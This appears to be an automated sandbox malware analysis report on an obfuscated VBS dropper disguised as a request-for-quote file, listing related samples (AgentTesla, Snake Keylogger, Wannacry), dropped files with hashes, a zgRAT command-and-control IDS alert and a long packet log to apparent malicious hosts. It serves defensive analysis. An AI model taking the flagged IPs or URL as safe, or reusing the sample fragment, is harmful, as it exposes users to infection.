	NEW SHIPPING DOCUMENTS.exe	Get hash	malicious	AgentTesla	Browse	51.159.14.89
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	51.159.14.89
	new order.exe	Get hash	malicious	AgentTesla	Browse	51.159.14.89
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	51.159.14.89
	NLWfV87ouS.dll	Get hash	malicious	Wannacry	Browse	51.159.14.89
	542CxvZnI5.dll	Get hash	malicious	Virut, Wannacry	Browse	51.159.14.89
	https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unk	Get hash	malicious	Unknown	Browse	51.159.14.89

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	INQ24-0122070030786451.bat	Get hash	malicious	Unknown	Browse
	8820_715_SCAN.vbs	Get hash	malicious	Unknown	Browse
	PaymentAdvice-1629043.vbs	Get hash	malicious	Neshta	Browse
	FileCopy.vbs	Get hash	malicious	Unknown	Browse
	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse
	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse
	GRAINS.vbs	Get hash	malicious	AgentTesla	Browse
	PRODUCT-PICTURE.bat	Get hash	malicious	AgentTesla	Browse
	Fattura-24SC-99245969925904728562.vbs	Get hash	malicious	Discord Token Stealer	Browse
	ilZhNx3JAc.bat	Get hash	malicious	AgentTesla	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1434
Entropy (8bit):	5.342612360333169
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhRAE4KzecKIE4oKNzKoZsXE4qdKqE4Kx1qE4DJE4TE4Ks:MxHKlYHKh3oRAHKzectHo60H8HKx1qHN
MD5:	522A73769A186964B7301AF1CBF6AF40
SHA1:	99FD48F31A76D9984243447AB9A0F00F3527463A
SHA-256:	9FCD97D035F201EA395E416D2C082AA59CB814B7EC1F3B72C97A870FEBBE097A
SHA-512:	5548DA45D1D1DFE399DCEEA81720B1B24F83FFCD775573B8A7F62A779D84853262EB97BA4142BE71DD19204FE5594949B6F2BB4650BDEAC17FEA17D6F703785A
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe
File Type:	data
Category:	dropped
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mm5sfz2w.xtf.ps1

Download File

Process:	C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zd2z0d0u.q3b.psm1

Download File

Process:	C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	5.502549953174867
Encrypted:	false
SSDEEP:	6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
MD5:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
SHA1:	F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
SHA-256:	73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
SHA-512:	6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: INQ24-0122070030786451.bat, Detection: malicious, Browse Filename: 8820_715_SCAN.vbs, Detection: malicious, Browse Filename: PaymentAdvice-1629043.vbs, Detection: malicious, Browse Filename: FileCopy.vbs, Detection: malicious, Browse Filename: Pyyidau.vbs, Detection: malicious, Browse Filename: Pyyidau.vbs, Detection: malicious, Browse Filename: GRAINS.vbs, Detection: malicious, Browse Filename: PRODUCT-PICTURE.bat, Detection: malicious, Browse Filename: Fattura-24SC-99245969925904728562.vbs, Detection: malicious, Browse Filename: ilZhNx3JAc.bat, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................\|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..\|...........................@..B........................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (65536), with no line terminators
Entropy (8bit):	6.491497157970056
TrID:
File name:	RFQ_43200046412000086500125.vbs
File size:	878'813 bytes
MD5:	e94f2e506d40bd58b44646f3fac80747
SHA1:	cf96f6bd5e8f37b0ec204ea98029de3dd70ecfdb
SHA256:	df53a625989cecc35e201e16649966ed99d8df4e71b7b9b53c1a5767e7235332
SHA512:	edb287df5b443ad2c0379bee468f7119645620038375043dcbd0dd59719d1fe8934e7e267bdaa89213e146b8c9513d960f98de2f404467278f1ceb43f990552a
SSDEEP:	12288:omfyhMxfwxxaTxRviNeStN4GlT613i+kx3t8SWq9Fq/5MQCZiY4E6yzztdX:V66mHLUi+kx3t8SWq9F28tGyP
TLSH:	B915CFA21E34ED8873986939BEAC3150D3E0DF7B2D77D62052A7EB5E1B2A8411710F71
File Content Preview:	' 97VEa+1soBVQa2G4SSPttZCPtZhG0j2W2rDkwlgF3TsK24HxKUFb9SQnG42DSYMUHXfrJ7xrGCR3rpA8iN68So0lrm2h+4tPNMBzH7evEpAtz6ThGrV/nsJdeXuwHmxGatAAXpsWcyLrnPP8+PltyJv/D7g52y/Xpg+qRIIPnhZTLbXmr7T1FlyC9X7CgqbJ8LHgsQ60DI6hKLeLay+g2/7dqMpEhhnnCfhbt+axFSNp4VTQL+0HnyEmRYf8a

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T11:38:34.356744+0100	2858531	ETPRO MALWARE Win32/zgRAT CnC Checkin	1	192.168.2.4	49737	194.226.169.227	9910	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 11:38:09.526221037 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:09.526312113 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:09.526717901 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:09.533427954 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:09.533505917 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.207216978 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.207348108 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.227142096 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.227185965 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.228049040 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.258254051 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.299340010 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.546318054 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.546377897 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.546457052 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.546471119 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.546505928 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.546545982 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.546580076 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.546580076 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.546618938 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.556159019 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.556229115 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.556273937 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.556303024 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.556333065 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.608263969 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.638767958 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.638802052 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.638870955 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.638909101 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.638936996 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.638947964 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.638977051 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.639009953 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.647489071 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.647550106 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.647583961 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.647629976 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.647641897 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.647701979 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.649271011 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.649318933 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.649349928 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.649363041 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.649396896 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.649435997 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.651107073 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.651155949 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.651191950 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.651202917 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.651264906 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.651289940 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.731175900 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.731245041 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.731297970 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.731363058 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.731405020 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.731534958 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.739818096 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.739878893 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.739914894 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.739950895 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.739974976 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.740309954 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.740914106 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.740978003 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.741007090 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.741039038 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.741050005 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.741101027 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.741667986 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.741713047 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.741753101 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.741764069 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.741796970 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.741816044 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.742651939 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.742693901 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.742732048 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.742743969 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.742773056 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.742790937 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.744251013 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.744297981 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.744342089 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.744353056 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.744386911 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.744405985 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.815500975 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.815567970 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.815618992 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.815650940 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.815681934 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.815701962 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.823467970 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.823524952 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.823611975 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.823626995 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.823664904 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.826463938 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.832376003 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.832470894 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.832499027 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.832523108 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.832546949 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.832576990 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.832736015 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.832802057 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.832844973 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.832855940 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.832884073 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.832906961 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.833055019 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.833100080 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.833136082 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.833144903 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.833189964 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.833208084 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.833539963 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.833586931 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.833632946 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.833642960 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.833673954 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.833698034 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.836756945 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.836800098 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.836839914 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.836850882 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.836879969 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.836898088 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.837048054 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.837088108 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.837131977 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.837141991 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.837173939 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.837208033 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.908005953 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.908083916 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.908119917 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.908169985 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.908185005 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.908219099 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.916057110 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.916101933 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.916153908 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.916167974 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.916203976 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.916224957 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.924669981 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.924730062 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.924772024 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.924803019 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.924834013 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.924856901 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.925038099 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.925085068 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.925129890 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.925141096 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.925174952 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.925195932 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.925353050 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.925393105 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.925429106 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.925438881 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.925482035 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.925506115 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.925649881 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.925690889 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.925726891 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.925735950 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.925770044 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.925793886 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.925935984 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.925980091 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.926023960 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.926033020 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.926069975 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.926089048 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.926198959 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.926255941 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.926296949 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.926306963 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:10.926337957 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:10.926376104 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.000634909 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.000699997 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.000746012 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.000777006 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.000808954 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.001719952 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.008771896 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.008841038 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.008872986 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.008891106 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.008927107 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.008959055 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.017102957 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.017164946 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.017203093 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.017234087 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.017262936 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.017297029 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.017471075 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.017525911 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.017554045 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.017564058 CET	443	49730	51.159.14.89	192.168.2.4
Jan 15, 2025 11:38:11.017596006 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.017622948 CET	49730	443	192.168.2.4	51.159.14.89
Jan 15, 2025 11:38:11.017775059 CET	443	49730	51.159.14.89	192.168.2.4
